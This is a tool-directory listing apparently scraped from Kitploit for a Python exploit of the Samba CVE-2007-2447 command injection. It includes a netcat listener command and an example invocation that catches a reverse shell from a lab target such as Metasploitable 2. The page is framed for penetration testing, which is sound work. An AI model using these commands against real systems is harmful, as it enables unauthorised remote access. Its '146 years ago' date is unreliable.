Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/3x1t1um/cve-2007-2447
Payload GenerationVulnerability AnalysisExploitationShellcodePenetration TestingRemote Access Tool
GitHub3x1t1um/cve-2007-2447

CVE-2007-2447

Python exploit for CVE-2007-2447 that triggers Samba username map script command injection to open a reverse shell on vulnerable targets.

View Repository
146 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2007-2447

To test the script I recommend you the virtual machine "metasploitable 2" available here. The script will display a reverse shell if the exploit works. To get the connection, just open a netcat session like :

root@kitploit:~
netcat -lnvp <port>

Table of contents

  • Exemples
  • Requirements
  • Payloads

Examples

root@kitploit:~
py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14

and on my netcat :

root@kitploit:~
netcat -lnvp 1337

Result :

netcat :

alt text

and on the script:

alt text

Requirements

  • mysmb
  • platform
  • sys
  • os

Payloads

I used a payload of a cheat-sheet. The link is available here. You can replace it with other payloads.

Download Tool